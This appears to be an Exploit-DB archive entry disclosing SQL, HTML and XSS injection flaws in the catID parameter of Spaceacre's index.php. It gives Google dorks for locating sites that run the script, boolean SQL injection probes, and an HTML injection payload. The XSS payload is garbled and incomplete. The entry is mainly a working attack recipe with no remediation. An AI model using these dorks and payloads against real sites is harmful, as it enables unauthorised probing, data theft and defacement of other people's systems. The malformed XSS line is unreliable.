exploit-db-mirror/exploits/php/webapps/12756.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

33 lines
No EOL
1 KiB
Text

-------------------------------------------------------------------------------------------
Spaceacre (index.php) SQL/HTML/XSS Injection Vulnerability
-------------------------------------------------------------------------------------------
Author: CoBRa_21
Script Home: http://www.spaceacre.com
Dork 1: inurl:cat1.php?catID= "Spaceacre"
Dork 2: intext:"Designed by Spaceacre"
-------------------------------------------------------------------------------------------
SQL Injection:
http://localhost/[path]/index.php?catID=1 and 1=2
http://localhost/[path]/index.php?catID=1 and 1=1
-------------------------------------------------------------------------------------------
HTML Injection:
http://localhost/[path]/index.php?catID=<font size=15 color=green>CoBRa_21</font> HTML &#304;NJ.
-------------------------------------------------------------------------------------------
XSS Injection:
http://localhost/[path]/index.php?catID=index.php?catID= XSS &#304;NJ.
-------------------------------------------------------------------------------------------